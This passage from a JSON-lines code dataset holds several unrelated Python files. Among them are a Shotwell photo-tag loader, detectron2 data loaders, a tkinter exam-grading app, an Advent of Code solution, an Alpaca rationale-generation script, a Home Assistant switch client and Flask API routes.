sqlalchemy.Table) - ' + str(ex))\n raise ex\n","repo_name":"rmarino72/PyLibs","sub_path":"RMLibs/database/SQLiteManager.py","file_name":"SQLiteManager.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7519669521","text":"import os\n\nfrom xdg.BaseDirectory import xdg_data_dirs\n\nfrom photofs._image import FileBasedImage\nfrom photofs._source import ImageSource, FileBasedImageSource\n\n\n# Try to import sqlite\ntry:\n import sqlite3\nexcept ImportError:\n sqlite = None\n\n\n@ImageSource.register('shotwell')\nclass ShotwellSource(FileBasedImageSource):\n \"\"\"Loads images and videos from Shotwell.\n \"\"\"\n def __init__(self, *args, **kwargs):\n if sqlite3 is None:\n raise RuntimeError('This program requires sqlite3')\n super(ShotwellSource, self).__init__(*args, **kwargs)\n\n @property\n def default_location(self):\n \"\"\"Determines the location of the *Shotwell* database.\n\n :return: the location of the database, or ``None`` if it cannot be\n located\n :rtype: str or None\n \"\"\"\n for d in xdg_data_dirs:\n result = os.path.join(d, 'shotwell', 'data', 'photo.db')\n if os.access(result, os.R_OK):\n return result\n\n def load_tags(self):\n db = sqlite3.connect(self._path)\n try:\n # The descriptions of the different image tables; the value tuple\n # is the header of the ID in the tag table, the map of IDs to\n # images and whether the table contains videos\n db_tables = {\n 'phototable': ('thumb', {}, False),\n 'videotable': ('video-', {}, True)}\n\n # Load the images\n for table_name, (header, images, is_video) in db_tables.items():\n results = db.execute(\"\"\"\n SELECT id, filename, exposure_time, title\n FROM %s\"\"\" % table_name)\n for r_id, r_filename, r_exposure_time, r_title in results:\n try:\n images[r_id] = FileBasedImage(\n r_title,\n r_filename,\n r_exposure_time,\n is_video)\n except OSError:\n # Ignore unreadable files\n pass\n\n # Load the tags\n results = db.execute(\"\"\"\n SELECT name, photo_id_list\n FROM tagtable\n ORDER BY name\"\"\")\n for r_name, r_photo_id_list in results:\n # Ignore unused tags\n if not r_photo_id_list:\n continue\n\n # Hierachial tag names start with '/'\n path = r_name.split('/') if r_name[0] == '/' else ['', r_name]\n path_name = os.path.sep.join(path)\n\n # Make sure that the tag and all its parents exist\n tag = self._make_tags(path_name)\n\n # The IDs are all in the text of photo_id_list, separated by\n # commas; there is an extra comma at the end\n ids = r_photo_id_list.split(',')[:-1]\n\n # Iterate over all image IDs and move them to this tag\n for i in ids:\n if i[0].isdigit():\n # If the first character is a digit, this is a legacy\n # source ID and an ID in the photo table\n image = db_tables['phototable'][1].get(int(i))\n else:\n # Iterate over all database tables and locate the image\n # instance for the current ID\n image = None\n for table_name, (header, images, is_video) \\\n in db_tables.items():\n if not i.startswith(header):\n continue\n image = images.get(int(i[len(header):], 16))\n break\n\n # Verify that the tag only references existing images\n if image is None:\n continue\n\n # Remove the image from the parent tags\n parent = tag.parent\n while parent:\n for k, v in list(parent.items()):\n if v == image:\n del parent[k]\n parent = parent.parent\n\n # Finally add the image to this tag\n tag.add(image)\n\n finally:\n db.close()\n","repo_name":"moses-palmer/photofs","sub_path":"lib/photofs/sources/shotwell.py","file_name":"shotwell.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"22167927244","text":"import numpy as np\n\nimport torch.utils\n\nfrom detectron2.data import get_detection_dataset_dicts, DatasetFromList\nfrom detectron2.data import MapDataset, samplers\nfrom detectron2.utils.env import seed_all_rng\nfrom detectron2.modeling import build_model\nfrom detectron2.checkpoint import DetectionCheckpointer\n\nfrom kernelphysiology.dl.pytorch.datasets.dataset_mapper import DatasetMapper\n\n\ndef worker_init_reset_seed(worker_id):\n seed_all_rng(np.random.randint(2 ** 31) + worker_id)\n\n\ndef trivial_batch_collator(batch):\n \"\"\"\n A batch collator that does nothing.\n \"\"\"\n return batch\n\n\ndef setup(opts, cfg_file=None):\n \"\"\"\n Create configs and perform basic setups.\n \"\"\"\n from kernelphysiology.dl.pytorch.configs.defaults import _C\n cfg = _C.clone()\n if cfg_file is not None:\n cfg.merge_from_file(cfg_file)\n cfg.merge_from_list(opts)\n cfg.freeze()\n # default_setup(cfg, args)\n return cfg\n\n\ndef get_coco_test(batch_size, opts, cfg_file):\n cfg = setup(opts, cfg_file)\n dataset_name = 'coco_2017_val_panoptic_separated'\n dataset_dicts = get_detection_dataset_dicts(\n [dataset_name],\n filter_empty=False,\n proposal_files=None,\n )\n\n dataset = DatasetFromList(dataset_dicts)\n mapper = DatasetMapper(cfg, False)\n dataset = MapDataset(dataset, mapper)\n\n sampler = samplers.InferenceSampler(len(dataset))\n batch_sampler = torch.utils.data.sampler.BatchSampler(\n sampler, batch_size, drop_last=False\n )\n\n data_loader = torch.utils.data.DataLoader(\n dataset,\n num_workers=4,\n batch_sampler=batch_sampler,\n collate_fn=trivial_batch_collator,\n )\n return data_loader\n\n\ndef get_coco_train(batch_size, opts, cfg_file):\n cfg = setup(opts, cfg_file)\n dataset_dicts = get_detection_dataset_dicts(\n cfg.DATASETS.TRAIN,\n filter_empty=cfg.DATALOADER.FILTER_EMPTY_ANNOTATIONS,\n min_keypoints=cfg.MODEL.ROI_KEYPOINT_HEAD.MIN_KEYPOINTS_PER_IMAGE\n if cfg.MODEL.KEYPOINT_ON\n else 0,\n proposal_files=cfg.DATASETS.PROPOSAL_FILES_TRAIN if cfg.MODEL.LOAD_PROPOSALS else None,\n )\n\n dataset = DatasetFromList(dataset_dicts, copy=False)\n\n mapper = DatasetMapper(cfg, True)\n dataset = MapDataset(dataset, mapper)\n\n sampler = samplers.TrainingSampler(len(dataset))\n batch_sampler = torch.utils.data.sampler.BatchSampler(\n sampler, batch_size, drop_last=True\n )\n # drop_last so the batch always have the same size\n train_loader = torch.utils.data.DataLoader(\n dataset,\n num_workers=4,\n batch_sampler=batch_sampler,\n collate_fn=trivial_batch_collator,\n worker_init_fn=worker_init_reset_seed,\n )\n\n return train_loader\n\n\ndef get_panoptic_network(opts, cfg_file, net_path):\n cfg = setup(opts, cfg_file)\n net = build_model(cfg)\n checkpointer = DetectionCheckpointer(net)\n checkpointer.load(net_path)\n net.train()\n return net\n","repo_name":"ArashAkbarinia/kernelphysiology","sub_path":"python/src/kernelphysiology/dl/experiments/intrasimilarity/panoptic_utils.py","file_name":"panoptic_utils.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"73277980531","text":"import unittest\nfrom unittest import TestCase\nfrom unittest.mock import patch\nimport bitcoin\n\nclass TestBitCoin(TestCase):\n @patch ('bitcoin.get_bitcoin_exchange')\n def test_convert_btc_to_dollars(self, mock_response):\n mock_response.return_value = 987789.121654\n\n expected = mock_response.return_value * 50\n exchange = bitcoin.get_bitcoin_exchange()\n actual = bitcoin.get_dollar_amount(50, exchange)\n self.assertAlmostEqual(expected, actual) #couldn't get the test to work with assertEqual--assertAlmostEqual works fine\nif __name__ == '__main__':\n unittest.main()","repo_name":"qdaniel4/moreUniteTestingLab","sub_path":"test_bitcoin.py","file_name":"test_bitcoin.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12712372804","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom metodos import *\n\n\nclass JanelaPrincipal:\n \"\"\"\"\" Janela Principal da aplicação \"\"\"\"\"\n\n def __init__(self):\n self.label_questao = []\n self.gabarito = []\n self.alternativas = []\n self.respostas = []\n self.porcentagem = []\n\n self.principal = Tk()\n self.principal.title(\"Correção de Prova Somatoria\")\n\n # Criando os Frames Principais\n self.frame_head = Frame(self.principal)\n self.frame_head.pack()\n self.frame_questao = Frame(self.principal)\n self.frame_questao.pack()\n self.frame_resultado = Frame(self.principal)\n self.frame_resultado.pack(side=RIGHT)\n\n # Configurando o Header\n Label(self.frame_head, text=\"Correção de Provas Somatórias\", font=\"Helvetica 14 bold\") \\\n .grid(row=0, column=0, padx=10, pady=10, columnspan=5)\n Label(self.frame_head, text=\"Escolha o tipo de prova\", font=\"Helvetica 10\") \\\n .grid(row=1, column=0, padx=5, pady=5)\n\n # Configurando Radio Botton\n self.tipo_prova = IntVar()\n self.tipo_prova.set(1)\n self.rb_t1 = Radiobutton(self.frame_head, text=\"Tipo 1\", value=1, variable=self.tipo_prova)\n self.rb_t1.grid(row=1, column=1, padx=5, pady=5)\n self.rb_t2 = Radiobutton(self.frame_head, text=\"Tipo 2\", value=2, variable=self.tipo_prova)\n self.rb_t2.grid(row=1, column=2, padx=5, pady=5)\n # Butão de ajuda falta iplementar\n self.img_ajuda = PhotoImage(file=\"./img/ajuda.png\")\n Button(self.frame_head, image=self.img_ajuda,\n command=lambda: messagebox.showinfo(\"Ajuda\",\n \"Tipo 1: Proma somatóra onde uma alternativa errada marcada \"\n \"como certa anula a questão completamente:\\n\\n\\n\"\n \"Tipo 2: Prova somatória que ultiliza como método de corre\"\n \"ção a formula:\\n\\n\"\n \"Se NPC>NPI\\n\"\n \"P = NP-(NTPC-(NPC-NPI))/NP\\n\"\n \"Se não P=0\\n\\n\"\n \"Onde:\\n\"\n \"P – Pontuação do candidato na questão\\n\"\n \"NP – Número de proposições da questão\\n\"\n \"NTPC – Número total de proposições corretas\\n\"\n \"NPC – Número de proposições corretas consideradas corretas pelo candidato\\n\"\n \"NPI – Número de proposições incorretas consideradas corretas pelo candidato\\n\"\n )).grid(row=1, column=3, padx=5, pady=5)\n\n # Adicionar as questões\n\n Label(self.frame_head, text=\"Quantidade de questões\").grid(row=2, column=0, padx=5, pady=5)\n self.img_mais = PhotoImage(file=\"./img/mais.png\")\n self.img_menos = PhotoImage(file=\"./img/menos.png\")\n Button(self.frame_head, image=self.img_mais, anchor=E, command=lambda: self.add_questao()).grid(row=2, column=1)\n Button(self.frame_head, image=self.img_menos, anchor=W, command=lambda: self.remover_questao()).grid(row=2,\n column=2)\n Button(self.frame_head, anchor=W, text=\"Corrigir\", command=lambda: self.corrigir()).grid(row=2, column=3)\n Label(self.frame_questao, text=\"Questão:\", font=\"Helvetica 10 bold\", anchor=\"center\").grid(row=0, column=0,\n padx=5, pady=5)\n Label(self.frame_questao, text=\"Nº de Alternativas:\", font=\"Helvetica 10 bold\", anchor=\"center\").grid(row=0,\n column=1,\n pady=5,\n padx=5)\n Label(self.frame_questao, text=\"Gabarito:\", font=\"Helvetica 10 bold\", anchor=\"center\").grid(row=0, column=2,\n pady=5, padx=5)\n Label(self.frame_questao, text=\"Resposta:\", font=\"Helvetica 10 bold\", anchor=\"center\").grid(row=0, column=3,\n pady=5, padx=5)\n Label(self.frame_questao, text=\"Porcentagem:\", font=\"Helvetica 10 bold\", anchor=\"center\").grid(row=0, column=4,\n pady=5, padx=5)\n\n # Loop inserindo as questões\n self.add_questao()\n\n # Bloco do resultado\n Label(self.frame_resultado, text=\"Resultado:\", font=\"Helvetica 10 bold\", anchor=\"center\").pack(side=LEFT,\n padx=5, pady=5)\n self.resultado = Label(self.frame_resultado, text=\"\", background=\"white\", width=15, borderwidth=1,\n relief=\"groove\")\n self.resultado.pack(side=RIGHT, padx=5, pady=5)\n\n # fim da janela\n self.principal.mainloop()\n\n def add_questao(self):\n alternativas_padrao = IntVar()\n alternativas_padrao.set(5)\n\n pos = len(self.label_questao) + 1\n temp = Label(self.frame_questao, text=f'Questão {pos}:', anchor=\"center\")\n self.label_questao.append(temp)\n self.label_questao[-1].grid(row=pos, column=0, padx=5, pady=5)\n temp = Entry(self.frame_questao, width=15, textvariable=alternativas_padrao, justify=CENTER)\n self.alternativas.append(temp)\n self.alternativas[-1].grid(row=pos, column=1, padx=5, pady=5)\n temp = Entry(self.frame_questao, width=15, justify=CENTER)\n self.gabarito.append(temp)\n self.gabarito[-1].grid(row=pos, column=2, padx=5, pady=5)\n temp = Entry(self.frame_questao, width=15, justify=CENTER)\n self.respostas.append(temp)\n self.respostas[-1].grid(row=pos, column=3, padx=5, pady=5)\n temp = Label(self.frame_questao, text=\"\", background=\"white\", width=15, borderwidth=1, relief=\"groove\")\n self.porcentagem.append(temp)\n self.porcentagem[-1].grid(row=pos, column=4, padx=5, pady=5)\n\n def remover_questao(self):\n if len(self.label_questao) > 1:\n self.label_questao[-1].destroy()\n del self.label_questao[-1]\n\n self.alternativas[-1].destroy()\n del self.alternativas[-1]\n\n self.gabarito[-1].destroy()\n del self.gabarito[-1]\n\n self.respostas[-1].destroy()\n del self.respostas[-1]\n\n self.porcentagem[-1].destroy()\n del self.porcentagem[-1]\n\n def corrigir(self):\n nota = 0\n\n try:\n for i in range(len(self.respostas)):\n\n if self.tipo_prova.get() == 1:\n r = corrigirMetodo1(int(self.gabarito[i].get()), int(self.respostas[i].get()),\n int(self.alternativas[i].get()))\n\n if r == 'false':\n messagebox.showerror(\"Erro:\", \"Gabarito ou Resposta não condiz com o número de alternativas\")\n else:\n self.porcentagem[i][\"text\"] = f\"{r:.2%}\"\n\n if self.tipo_prova.get() == 2:\n r = corrigirMetodo2(int(self.gabarito[i].get()), int(self.respostas[i].get()),\n int(self.alternativas[i].get()))\n if r == 'false':\n messagebox.showerror(\"Erro:\", \"Gabarito ou Resposta não condiz com o número de alternativas\")\n else:\n self.porcentagem[i][\"text\"] = f\"{r:.2%}\"\n\n nota = nota + r\n nota = nota / len(self.respostas)\n self.resultado[\"text\"] = f'{nota * 10:.1f}'\n except ValueError:\n messagebox.showerror(\"Erro\", \"Preencha todas as informações com números inteiros positivos\")\n\n\n\nif __name__ == '__main__':\n\n r = corrigirMetodo2(14,21,5)\n print(r)\n if r == 'false':\n print('nao foi')\n else:\n print('foi')\n\n","repo_name":"rafaelfbastos/correcao_provas_somatorias","sub_path":"janela_principal.py","file_name":"janela_principal.py","file_ext":"py","file_size_in_byte":8813,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41962120176","text":"import pandas as pd\n\ndata = pd.read_csv(\"/home/pyo/Downloads/module4/train_20000.csv\", names=['ID','product','a','b'])\ndata=data.drop(['a','b'],axis =1)\n\n\ncart = []\nID = data['ID'][0]\ntemp = []\nfor i in range(0,20000):\n\tif(ID==data['ID'][i]):\n\t\ttemp.append(data['product'][i])\n\telse:\n\t\tcart.append(temp)\n\t\ttemp=[]\n\t\tID=data['ID'][i]\n\t\ttemp.append(data['product'][i])\n\n\n","repo_name":"Pyohr/BigData-analysis","sub_path":"test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42443382693","text":"from collections import deque\nimport copy\n# Constants representing the possible states of a tile\nELF = '#'\nGROUND = '.'\n\ndirections = [(-1, 0, 'N'), (1, 0, 'S'), (0, -1, 'W'), (0, 1, 'E'), (-1, -1, 'NW'), (-1, 1, 'NE'), (1, -1, 'SW'), (1, 1, 'SE')]\nvalid_directions = deque([(-1, 0, 'N'), (1, 0, 'S'), (0, -1, 'W'), (0, 1, 'E')])\n\n# ___ _ _ _ _ \n# / __|___| |_ (_)_ _ (_) |_ _ __ ___ ___\n# | (_ / -_) _| | | ' \\| | _| | '_ \\/ _ (_-<\n# \\___\\___|\\__| |_|_||_|_|\\__| | .__/\\___/__/\n# |_| \n\ndef get_init_pos_elves(matrix: list) -> list:\n elves = []\n for i in range(len(matrix)):\n for j in range(len(matrix[i])):\n if matrix[i][j] == \"#\":\n elves.append((i,j))\n return elves\n\n# ___ _ _ ___ ___ ___ _ _ _ _ ___ _ _ _ _ _ ___ _ ___ ___ \n# / _ \\| \\| | __| | _ \\/ _ \\| | | | \\| | \\ | || | /_\\ | \\| | \\| | | __| _ \\\n# | (_) | .` | _| | / (_) | |_| | .` | |) | | __ |/ _ \\| .` | |) | |__| _|| /\n# \\___/|_|\\_|___| |_|_\\\\___/ \\___/|_|\\_|___/ |_||_/_/ \\_\\_|\\_|___/|____|___|_|_\\\n\ndef consider_move(grid, i, j):\n for dx, dy, direction in valid_directions: # directions define here as global variable\n \n if 0 <= i + dx <= height and 0 <= j + dy <= width:\n try:\n if not any(grid[i+di][j+dj] == ELF for di, dj in [(0, 1), (0, -1), (1, 0), (-1, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)] if i+di >= 0 and i+di <= height and j + dj >= 0 and j + dj <= width):\n return None\n\n elif grid[i + dx][j + dy] == GROUND:\n if (direction == 'N' or direction == 'S') and grid[i + dx][j + 1 + dy] == GROUND and grid[i + dx][j - 1 + dy] == GROUND: \n return (i + dx, j + dy)\n\n if (direction == 'W' or direction == 'E') and grid[i + 1 + dx][j + dy] == GROUND and grid[i - 1 + dx][j + dy] == GROUND:\n return (i + dx, j + dy)\n except:\n continue\n\n return None # no valide moves found\n\ndef one_round_move_elves(grid, elves, round):\n flag = 0\n elves_check = copy.deepcopy(elves)\n # proposed_moves keys will be the proposed moves, and the value the initial value of elves before moving\n proposed_moves = {} # reset dict for each ROUND\n for i, j in elves:\n proposed_destination = consider_move(grid, i, j)\n\n if proposed_destination:\n if proposed_destination in proposed_moves:\n proposed_moves[proposed_destination].append((i, j))\n else:\n proposed_moves[proposed_destination] = [(i, j)]\n\n for new_pos in proposed_moves:\n if (len(proposed_moves[new_pos])) == 1:\n xinit, yinit = proposed_moves[new_pos][0]\n xnew, ynew = new_pos\n grid[xinit] = grid[xinit][:yinit] + '.' + grid[xinit][yinit + 1:]\n grid[xnew] = grid[xnew][:ynew] + '#' + grid[xnew][ynew + 1:]\n index = next(i for i, pos in enumerate(elves) if pos[0] == xinit and pos[1] == yinit)\n elves[index] = (xnew, ynew)\n t=1\n \n if set(elves_check) == set(elves):\n print(f\"The first round where no elves moves is: {round + 1}\")\n flag = 1\n return grid, elves, flag\n\ndef count_empty_ground_tiles(grid):\n # Find the minimum and maximum row and column indices that contain an elf\n min_row, max_row = float('inf'), -float('inf')\n min_col, max_col = float('inf'), -float('inf')\n\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n if grid[i][j] == ELF:\n min_row = min(min_row, i)\n max_row = max(max_row, i)\n min_col = min(min_col, j)\n max_col = max(max_col, j)\n \n # Count the number of empty ground tiles in the rectangle\n count = 0\n for i in range(min_row, max_row+1):\n for j in range(min_col, max_col+1):\n if grid[i][j] == GROUND:\n count += 1\n \n return count \n\n# __ __ _ ___ _ _ \n# | \\/ | /_\\ |_ _| \\| |\n# | |\\/| |/ _ \\ | || .` |\n# |_| |_/_/ \\_\\___|_|\\_|\n \nif __name__ == '__main__':\n\n filename = \"23.in\"\n with open(filename, 'r') as f:\n datas = f.read().strip().split(\"\\n\")\n\n width = len(datas[0])\n height = len(datas)\n elves = get_init_pos_elves(datas)\n nb_round = 1000\n\n for round in range(nb_round):\n datas, elves, flag = one_round_move_elves(datas, elves, round)\n valid_directions.rotate(-1)\n if flag == 1:\n break\n count_nb_tiles = count_empty_ground_tiles(datas)\n print(f\"First part: There is {count_nb_tiles} empty ground tiles for {round + 1} rounds\")\n print(f\"Second part: The first round where elves stop moving is {round + 1}\")\n\n\n","repo_name":"RomB29/Advent_of_code","sub_path":"2022/23/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":4842,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"6148033054","text":"class Cooperator:\r\n def __init__(self, name, age, salary):\r\n self.name = name\r\n self.age = age\r\n self.salary = salary\r\n\r\n def information(self):\r\n print(\"Имя:\", self.name)\r\n print(\"Возраст:\", self.age)\r\n print(\"Зарплата:\", self.salary)\r\n\r\ncooperator1 = Cooperator(\"Никита\", 20, 100000)\r\ncooperator2 = Cooperator(\"Андрей\", 33, 15000)\r\ncooperator3 = Cooperator(\"Анна\", 40, 330000)\r\n\r\ncooperators = [cooperator1, cooperator2, cooperator3]\r\n\r\nfor cooperator in cooperators:\r\n cooperator.information()\r\nprint()","repo_name":"annashteynert/Shteynert-AD-2","sub_path":"task24.py","file_name":"task24.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2105447340","text":"import os\nimport jsonlines\nfrom tqdm import tqdm\nimport torch\nfrom peft import PeftModel\n\nfrom typing import Optional\n\nfrom datasets import load_dataset\nfrom langchain import PromptTemplate, FewShotPromptTemplate\nfrom transformers import AutoModelForCausalLM, T5Tokenizer, AutoTokenizer, AutoConfig\nfrom transformers import GenerationConfig, LlamaForCausalLM, LlamaTokenizer\n\n# from src.few_shot.utils import save_to_disk\n# from src.few_shot.together import infer\n\n\nBASE_PATH = \"/storage/ukp/work/sachdeva/research_projects/exp_calibration/\"\n\n\ndef save_to_disk(data, file_name):\n with jsonlines.open(file_name, \"a\") as writer:\n for example in tqdm(data, total=len(data), desc=\"Saving samples ... \"):\n writer.write(example)\n\n\nclass LLMClient:\n def __init__(\n self,\n template,\n model_name_or_path: str = None,\n tokenizer_name_or_path: Optional[str] = None,\n data_path: str = None,\n threshold: float = 0.5,\n task: str = \"qg\",\n max_new_tokens: int = 50,\n temperature: float = 0.01,\n top_p: float = 1,\n top_k: int = 40,\n repetition_penalty: float = 1.0,\n save_results: bool = True,\n max_samples: int = None,\n stop: str = \"\\n\",\n ):\n self.base_model = model_name_or_path\n self.tokenizer = tokenizer_name_or_path\n self.max_new_tokens = max_new_tokens\n self.temperature = temperature\n self.top_p = top_p\n self.top_k = top_k\n self.repetition_penalty = repetition_penalty\n self.data_path = data_path\n self.task = task\n self.threshold = threshold\n self.save_results = save_results\n self.max_samples = max_samples\n self.stop = stop.split(\";\")\n self.device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n self.lora_weights = f\"{BASE_PATH}alpaca-cot-13b\"\n\n def _load_model(self):\n tokenizer = LlamaTokenizer.from_pretrained(self.base_model)\n model = LlamaForCausalLM.from_pretrained(\n self.base_model,\n load_in_8bit=True,\n torch_dtype=torch.float16,\n device_map=\"auto\",\n )\n model = PeftModel.from_pretrained(\n model, self.lora_weights, torch_dtype=torch.float16,\n )\n model.to(self.device)\n # unwind broken decapoda-research config\n model.config.pad_token_id = tokenizer.pad_token_id = 0 # unk\n model.config.bos_token_id = 1\n model.config.eos_token_id = 2\n return model, tokenizer\n\n def _create_zero_shot_prompt(self, context, question, answer):\n prompt = qg_template.format(context=context, question=question, answer=answer)\n return prompt\n\n def generate(self):\n c = 0\n skipped_instances = 0\n examples = []\n model, tokenizer = self._load_model()\n\n model_identifier = self.base_model.split(\"/\")[-1]\n save_path = (\n BASE_PATH\n + f\"src/data/squad/{model_identifier}_{self.task}_pipeline_temp_0.7\"\n )\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n\n # load squad data\n dataset = load_dataset(\"squad\", \"plain_text\")\n train_data = dataset[\"train\"]\n squad_data = [\n sample\n for sample in tqdm(\n train_data, total=len(train_data), desc=\"Loading SQuAD data ... \"\n )\n ]\n\n current_files = []\n file_names = []\n file_path = BASE_PATH + f\"src/data/squad/{self.data_path}\"\n file_names = [file_path]\n\n model.eval()\n for file_name in file_names:\n with jsonlines.open(file_name) as reader:\n for example in tqdm(reader):\n try:\n id = example[\"id\"].split(\"_\")[0]\n context = example[\"context\"]\n orig_example = [\n sample for sample in squad_data if sample[\"id\"] == id\n ][0]\n # print(orig_example)\n orig_context = orig_example[\"context\"]\n orig_question = orig_example[\"question\"]\n orig_answer = orig_example[\"answers\"]\n c += 1\n\n if self.max_samples:\n if c == self.max_samples:\n break\n\n prompt = self._create_zero_shot_prompt(\n context=orig_context,\n question=orig_question,\n answer=orig_answer[\"text\"][0],\n )\n # print(prompt)\n\n inputs = tokenizer(prompt, return_tensors=\"pt\").to(self.device)\n\n outputs = model.generate(\n **inputs,\n max_new_tokens=self.max_new_tokens,\n temperature=self.temperature,\n top_p=self.top_p,\n top_k=self.top_k,\n repetition_penalty=self.repetition_penalty,\n do_sample=True,\n # num_return_sequences=1,\n early_stopping=True,\n pad_token_id=tokenizer.eos_token_id,\n )\n output = tokenizer.decode(outputs[0], skip_special_tokens=True)\n # remove the context from the output\n output = output[len(prompt) :]\n\n result = {\"id\": example[\"id\"], \"context\": context}\n\n print(\"Context:\", orig_context)\n print(\"Question:\", orig_question)\n print(\"Answer:\", orig_answer[\"text\"][0])\n print(\"Explanation:\", output)\n print(\"-\" * 100)\n #\n # examples.append(result)\n # if self.save_results:\n # if c % self.threshold == 0:\n # save_to_disk(\n # examples,\n # f\"{save_path}/counterfactual_samples_{model_identifier}_{c}.jsonl\"\n # )\n # examples = []\n except Exception as e:\n # print(outputs)\n skipped_instances += 1\n print(f\"Skipped instance {c} due to error: {e}.\")\n continue\n\n if c == 5:\n break\n\n # save the remaining examples\n # if self.save_results:\n # if examples:\n # save_to_disk(\n # examples,\n # f\"{save_path}/counterfactual_samples_{model_identifier}_{c}.jsonl\"\n # )\n break\n\n\nif __name__ == \"__main__\":\n\n qg_template = \"\"\"\nAs an answer explainer, your job is to give a rationale for the answer to the following question given the context it is derived from. \nThe rationale should express a clear thought of reasoning that led to the answer.\n\nContext: {context}\n\nQuestion: {question}\n\nAnswer: {answer}\n\nRationale: Let's think step by step,\n\n\"\"\".strip()\n\n model = \"decapoda-research/llama-13b-hf\"\n client = LLMClient(\n template=qg_template,\n model_name_or_path=model,\n tokenizer_name_or_path=model,\n task=\"zero-shot-cot\",\n data_path=\"squad_counterfactuals_28_03.jsonl\",\n threshold=1000,\n max_new_tokens=128,\n temperature=0.7,\n top_p=1,\n top_k=40,\n repetition_penalty=1.0,\n save_results=True,\n max_samples=None,\n )\n\n client.generate()\n","repo_name":"UKPLab/CATfOOD","sub_path":"src/cf_generation/llm_generation/alpaca_cot.py","file_name":"alpaca_cot.py","file_ext":"py","file_size_in_byte":7923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"23304261257","text":"import asyncio\nimport logging\nfrom functools import partial\nimport requests\n\nlogger = logging.getLogger(__name__)\n\n\nasync def async_request(method, *args, **kwargs):\n loop = asyncio.get_running_loop()\n func = partial(\n getattr(requests, method),\n *args,\n **kwargs,\n )\n result = await loop.run_in_executor(None, func)\n return result\n\n\nclass HomeAssistantLight:\n def __init__(self, ha_host, ha_token, ha_entity, on_update) -> None:\n self.on_update = on_update\n self.connected = False\n self.current_state = None\n\n self.ha_host = ha_host\n self.ha_token = ha_token\n self.ha_entity = ha_entity\n self.ha_domain = \"switch\"\n\n async def set_state(self, state):\n service = \"turn_on\" if state else \"turn_off\"\n data = {\n \"entity_id\": self.ha_entity,\n }\n endpoint = f\"/api/services/{self.ha_domain}/{service}\"\n resp = await self._http_post(endpoint, data)\n updated_state = self._state_after_service(resp)\n if updated_state is not None:\n self.current_state = updated_state\n self.on_update()\n\n async def get_state(self):\n endpoint = f\"/api/states/{self.ha_entity}\"\n resp = await self._http_get(endpoint)\n return resp[\"state\"]\n\n def disconnect(self):\n self.connected = False\n\n def connect(self):\n self.connected = True\n asyncio.get_running_loop().create_task(self.state_polling())\n\n async def state_polling(self):\n while self.connected:\n try:\n state = await self.get_state()\n except:\n state = \"error\"\n\n self.current_state = state\n self.on_update()\n\n await asyncio.sleep(60)\n\n def _state_after_service(self, resp):\n for change in resp:\n if change[\"entity_id\"] == self.ha_entity:\n return change[\"state\"]\n return None\n\n def _http_headers(self):\n return {\n \"Authorization\": f\"Bearer {self.ha_token}\",\n \"content-type\": \"application/json\",\n }\n\n async def _http_get(self, endpoint):\n resp = await async_request(\n \"get\",\n f\"{self.ha_host}{endpoint}\",\n headers=self._http_headers(),\n timeout=2,\n )\n resp.raise_for_status()\n return resp.json()\n\n async def _http_post(self, endpoint, data):\n resp = await async_request(\n \"post\",\n f\"{self.ha_host}{endpoint}\",\n json=data,\n headers=self._http_headers(),\n timeout=2,\n )\n resp.raise_for_status()\n return resp.json()\n","repo_name":"wlatanowicz/kalwy-ao","sub_path":"devices/hardware/HomeAssistantLight.py","file_name":"HomeAssistantLight.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11695166025","text":"from flask import Blueprint\nfrom .resources import *\nfrom app.ext import api\n\n\napi_v1 = Blueprint(\"api_v1\",__name__)\n\n\n# user\napi.route(UserDetail,\"user_detail\",\"/user/\",\"/order//user\")#GET PATCH DELETE, pendiente el post user, cambiar al resource list \napi.route(UserList,\"user_list\",\"/user\", \"/role//user\")#GET users, POST User.\napi.route(UserRelationship,\"user_roles\",\"/user//relationship/role\")#GET POST PATCH DELETE relationship\napi.route(UserOrderRelationship,\"user_order\",\"/user//relationship/order\")#GET POST PATCH DELETE relationship \n# role\napi.route(RoleDetail,\"role_detail\", \"/role/\") #GET PATCH DELETE role\napi.route(RoleList,\"role_list\", \"/role\" ,\"/user//role\") #GET POST role, POST role=>user\napi.route(RoleRelationship,\"role_users\",\"/role//relationship/user\") #GET POST PATCH DELETE relationship \n# category\napi.route(CategoryDetail,\"category_detail\",\"/category/\", \"/article//category\") #GET PATCH DELETE category \napi.route(CategoryList, \"category_list\", \"/category\") #GET POST CATEGORY\napi.route(CategoryRelationship, \"category_articles\", \"/category//relationship/article\") #GET POST PATCH DELETE relationship DELETE NO FUNCION CORREGIR 204\n\n# articles\napi.route(ArticleDetail,\"article_detail\",\"/article/\",\"/orderarticle//article\")##GET PATCH DELETE USER E PATCH ARTICLE_ID\napi.route(ArticleList, \"article_list\", \"/article\", \"/category//article\")#GET POST ARTICLE, POST ARTICLE => CATEGORY\napi.route(ArticleRelationship, \"article_category\", \"/article//relationship/category\")#GET POST PATCH DELETE relationship\napi.route(ArticleAsscOrderRelationship, 